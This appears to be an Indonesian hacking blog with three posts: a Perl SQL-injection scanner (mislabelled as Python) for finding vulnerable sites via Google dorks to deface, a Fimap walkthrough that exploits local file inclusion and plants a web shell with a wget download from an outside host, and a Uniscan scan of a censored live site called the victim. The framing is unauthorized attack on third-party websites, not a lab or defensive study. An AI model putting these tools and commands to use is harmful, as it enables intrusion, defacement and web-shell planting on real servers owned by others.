Indonesian Blogger

Banner iskaruji dot com

Selasa, 04 Desember 2012

0 Scan SQL Vuln with Python

mungkin temen2 gak mau main tebak2an sama mbah google untuk mencari / membuka satu persatu web yg vuln buat di depes.
so copy script dibawah ini :


Quote:
Code:
#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner        .:.
# .:. Version : 3.0 fixed (06/10/2012)        .:.
# .:. Author : Metropolis                     .:.
# .:. Home : https://www1.r00tw0rm.com/       .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection                         .:.
# .:. MSAccess Injection                      .:.
# .:. MSSQL Injection                         .:.
# .:. Oracle Injection                        .:.
# .:. Blind Injection                         .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
#  Useless version :
#  http://pastebin.com/kKxCCJuU 1.0
#  http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;

getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
    $opts{'p'} = 1;
}

print <<"Metropolis_intro";


    ___________
   |.---------.|
   ||         ||
   || scanner ||   
   ||         ||   
   |'---------'|   
    `)__ ____('     
    [=== -- o ]--.
  __'---------'__ \     
[::::::::::: :::] )
`""'"""""'""""`/T\\
                \\_/

Metropolis_intro
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";

for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
    $t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/href
=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
      $out =~s/$/\'/;
           
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($out);
            $error = $response->content();
            if($error =~m/SQL syntax/)
                {print "$out Vulnerable MySQL!\n";}
               
            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
                {print "$out Vulnerable MS Access!\n";}
               
            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
                {print "$out Vulnerable MSSQL!\n";}
           
            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
                {print "$out Vulnerable Blind Possible!\n";}
               
            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
                {print "$out Vulnerable Oracle!\n";}
               
            }
        }
        }
        }
kemudian save dengan nama "sql-scan.py"

setelah itu jalankan di terminal kalian
ketik:

Code:
[color=red]@bt:#[/color] ./sql-scan.py -k [dork nya] -p [lalu enter]
nih sreenshot nya

[Image: Screenshot-5.png]


untuk dork silahkan dicari sendiri, sama embah kan ada banyak tu

0 Upload Backdoor or Shell From Local File Inclusion with Fimap

1. Pertama download dulu Fimap nya di   Google Code
2. Setelah di download exract filenya nya. Dan mulailah mencari target LFI.

3. Setelah mendapatkan target nya. Buka terminal kamu (untuk pengguna linux) dan buka cmd kamu (untuk pengguna windows)

4. Masuklah ke direktori folder fimap tadi.

5. Ketikkan command berikut ini :


Pengguna linux :

Code:
./fimap.py -u "[url target]"
 
Pengguna windows :
Code:
fimap.py -u "[url target]"
  
 hide
[Image: 1-1.png]

6. Setelah proses analisa selesai ketikkkan lagi :
Code:
./fimap.py -x

 hide
[Image: Screenshotfrom2012-05-29160211.png]

7. Tunggulah hingga proses selesai. Setelah itu pilih option nomor 1 :
 hide
[Image: Screenshotfrom2012-05-29160226.png]

8. Setelah itu pilih lagi option nomor 1 :

 hide
[Image: Screenshotfrom2012-05-29160244.png]

9. Setelah proses selesai pilih lagi option nomor 1. Spawn Fimap shell :



10. Dan sekarang lihatlah. Taraaaa. Sekarang kita udah di halaman utama user du public_html :). Ketikkan command berikut ini untuk mengambil script shell atau backdoor kemudian menyimpannya di server tersebut dengan nama homo.php
Code:
wget http://www.heng-sieng.fr/bug.txt -O homo.php
 hide
[Image: Screenshotfrom2012-05-29160422.png]


11. Terakhir. Sekarang liatlah apakah shell kita berhasil di upload atau tidak ? Ternyata ? Yeah berhasil. Good job :)
 hide
[Image: Screenshotfrom2012-05-29160444.png]














0 Uniscan Vulnerability Scanner

Uniscan adalah scanner kerentanan untuk aplikasi web, yang ditulis dalam 'perl' untuk lingkungan Linux. Ini dikembangkan sebagai pekerjaan kesimpulan dari program ilmu komputer dari Universitas Federal Pampa dan berlisensi di bawah GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).
So, jadi intinya uniscan berfungsi untuk mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi dan uniscan juga berguna untuk mencari folder-folder atau directory dari sebuah situs.

sebelumnya ini saya paparkan bagi pengguna linux

Fitures of uniscan

Quote:-Identifikasi halaman sistem melalui Web Crawler.
-Penggunaan benang di crawler.
-Mengontrol jumlah maksimum permintaan crawler.
-Pengendalian variasi halaman sistem diidentifikasi oleh Web Crawler.
-Pengendalian ekstensi file yang diabaikan.
-Uji halaman yang ditemukan melalui metode GET.
-Uji bentuk ditemukan melalui metode POST.
-Dukungan untuk permintaan SSL (HTTPS).
-Proxy dukungan.
-Menghasilkan daftar situs menggunakan Google.
-Menghasilkan daftar situs menggunakan Bing.
-Plug-in mendukung untuk Crawler.
-Plug-in mendukung untuk tes dinamis.
-Plug-in mendukung untuk tes statis.
-Plug-in mendukung untuk tes stres.
-Dukungan multi-bahasa.
-Web client.
-Klien GUI ditulis dalam perl menggunakan tk.


bagi yg belum ada untuk instalasi
ketik perintah berikut :

:~$apt-get install uniscan

bagi pengguna BT bisa di dapat di : cd /pentest/web/uniscan

selanjudnya saya akan coba mempraktek-kan nya dgn salah satu situs http://www.X.com (maaf nama di sensor)

oke, untuk menjalankannya ketik perintah berikut

root@bt:/pentest/web/uniscan# ./uniscan.pl -u http://www.X.com -qweds

penjelasan :

q:directory
w:file
e:file robot.txt
d:dinamic /mencari celah atau bug yg ada pada site tersebut
s:static

[Image: Screenshot-1-2.png]

oke, berikut Screenshot dari hasil uniscan yg saya coba:

[Image: Screenshot-2-1.png]
#nah keliatan kan Server sama IP korban.
#Directory Check ==> directory yg di temukan oleh uniscan , oke NEXT


[Image: Screenshot-3-1.png]
#File Check ==> disini saya hanya menemukan satu file dalam situs korban
#Tidak ditemukannya Robots.txt dan Sitemap.xml
#Crawl Started ==> adalah pencarian situs target yang akan diuji.

selanjutnya :

[Image: Screenshot-4-1.png]

#disini saya tidak menemukan Web Backdoors, Timthumb dan File Upload Forms
#ada beberapa external host yg kita temukan
#dan lagi-lagi saya tidak menemukan FCKeditor File Upload.

oke, selanjutnya:

[Image: Screenshot-5-1.png]
#tuh keliatan E-mails yg ada pada site korban
#disini juga saya tidak menemukan adanya Source Code Disclosure, PHPinfo () Disclosure, Ignored Files
#Dinamic Test , oke. sama halnya seperti Crawl Started,
Next


[Image: Screenshot-6-1.png]
#NULL FCKeditor Test tidak berisi apa-apa.


[Image: Screenshot-7-1.png]
#NOTHINK FOR FILES, hmmm not good

oke, lanjut


[Image: Screenshot8.png]
[Image: Screenshot9.png]
#tidak di temukan nya Remote Command Execution and Remote File Include.
#Uniscan sedang melalukan proses SQLinjection
oke, selanjutnya


[Image: Screenshot-10.png]
#NOTINK FILES Cross-Site Scripting (XSS) dan Web Shell Finder
#Local File Include dan Remote Command Execution, NOTHINK

oke, selanjutnya


[Image: 11-3.png]

#oke Job FINISH


hmmm, not good.

oke, Sedikit Pengertian mengenai Penjelasan diatas


Quote:#Directory checking
memeriksa direktori membantu untuk menemukan direktori tersembunyi, dengan kata lain, isi direktori yang tidak ditemukan oleh crawler tidak diuji.

#File checking
Pemeriksaan berkas mengikuti prinsip yang sama untuk memeriksa direktori.

#Checking robots.txt file
Memeriksa file robots.txt berfungsi untuk memberi makan crawler dengan direktori dan file yang tidak dapat ditemukan oleh crawler. Pemeriksaan ini mengabaikan Izinkan dan pola Larang dari file jenis ini, setiap direktori dan file ditemukan di sini akan ditambahkan ke crawler.

#Checking sitemap.xml file
Pengecekan file sitemap.xml mengikuti prinsip-prinsip yang sama untuk memeriksa file robots.txt.

#Crawler
Fungsi dari crawler adalah untuk menavigasi ke halaman pencarian situs target yang akan diuji kemudian oleh tes mesin dan mengumpulkan informasi sensitif.

Plug-ins

#check Upload Form.pm
mengidentifikasi bentuk file upload, file yang sering diupload dan tidak divalidasi, oleh krn itu dapat menyebabkan risiko serius ke server yang host situs target.

#code Disclosure.pm
pencarian untuk potongan kode bahasa pemrograman dalam HTML dikirim oleh aplikasi web. Sebuah kode meninggalkan sebagai komentar HTML berpotensi membahayakan keamanan aplikasi Web, karena dalam potongan kode kecil, Anda dapat mengidentifikasi variabel dan nilai-nilai yang relevan dengan sistem Anda, seperti nama pengguna dan password untuk database.

#E-mail Colect.pm
memiliki fungsi mengumpulkan e-mail yang dikirim dalam HTML oleh aplikasi target. Seringkali e-mail alias sesuai dengan username yang digunakan di layanan lain, seperti SSH. Sehingga membuatnya lebih sederhana satu bruteforce layanan ini.

#External Host.pm
mengidentifikasi link ke situs lain. Dengan plug-in ini kita dapat menemukan aplikasi atau link ke organisasi lain.

#FCKeditor.pm
mencoba untuk meng-upload sebuah file txt ke situs target ketika bertemu dengan direktori yang berisi skrip FCKeditor. Kerentanan meng-upload file sewenang-wenang sangat berbahaya bagi server hosting aplikasi web.

#phpinfo.pm
mengidentifikasi halaman yang menggunakan phpinfo PHP function (). Fungsi ini menunjukkan informasi lingkungan yang sensitif terhadap penyerang. Informasi tersebut tidak boleh diakses oleh siapa pun kecuali tim pengembangan aplikasi web.

#Timthumb.pm
mengidentifikasi file rentan terhadap kerentanan Timthumb dengan versi lebih rendah dari versi 1,33. Dari kerentanan ini memungkinkan untuk meng-upload file untuk mengeksekusi perintah pada server target.

#webShellDisclosure.pm
upaya untuk mengidentifikasi Webshells mungkin tersembunyi di direktori dari aplikasi Web dalam analisis, dianjurkan untuk menggunakan plug-in ketika diidentifikasi file formulir pemuatan tanpa otentikasi atau ketika host target telah dikompromikan di beberapa cara.

pengertian dari penjelasan ini saya dapat dari sumber http://uniscan.sourceforge.net/


mungkin itu aja yg bisa saya sampaikan mengenai fungsi dari uniscan, so maaf kalo banyak kesalahan.

thank's
-::DESCRIPTION
-::DATE
Diberdayakan oleh Blogger.